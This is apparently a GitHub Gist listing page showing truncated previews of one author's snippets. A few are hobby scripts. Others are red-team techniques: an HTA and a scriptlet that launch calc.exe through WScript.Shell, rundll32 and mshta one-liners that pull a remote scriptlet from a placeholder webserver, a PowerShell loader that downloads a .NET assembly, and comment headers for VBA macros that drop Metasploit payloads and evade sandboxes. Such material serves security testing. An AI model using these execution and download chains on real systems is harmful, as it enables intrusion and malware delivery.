Skip to content

Instantly share code, notes, and snippets.

@Arno0x
Arno0x / pwTester.py
Created March 6, 2024 13:19
Password conformity checker
import re, json
from math import log2
import getpass
import requests, zipfile, io
import os, datetime
import hashlib
from collections import Counter
from functools import reduce
#=================================================================
@Arno0x
Arno0x / pendu.py
Created February 28, 2024 13:16
Jeu du pendu en Python et en ligne de commande
#!/usr/bin/python
# -*- coding: utf8 -*-
from sys import stdout
import json
import os
# Import external modules
try:
import requests
except ModuleNotFoundError as e:
@Arno0x
Arno0x / life.py
Created February 28, 2024 13:15
Game of life in Python3 - Command line - Full options
#!/usr/bin/python
# -*- coding: utf8 -*-
import sys
import random
import time
import re
import argparse
import os
# Import external modules
@Arno0x
Arno0x / TestAssembly.cs
Last active February 21, 2024 20:47
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@Arno0x
Arno0x / calc.hta
Created November 17, 2017 16:54
HTML Application example to be executed by mstha.exe
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
@Arno0x
Arno0x / scriptlet.sct
Created November 17, 2017 16:49
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
@Arno0x
Arno0x / loadAssembly_method1.ps1
Last active October 12, 2023 23:19
Load a .Net assembly dynamically from PowerShell
$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {
' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload
'
' This macro searches for a marker paragraph, namely "marker" in the example below
' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to
' a local file.
'
' Example, in the word document:
' marker
' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 ....
' Author Arno0x0x - https://twitter.com/Arno0x0x
'
' This macro downloads an XML bibliography source file.
' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
' which itself contains another malicious macro much more detectable (meterpreter for instance).
'
' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder
' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it.
'
' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse
#======================================================================================================
# HELPERS FUNCTIONS
#======================================================================================================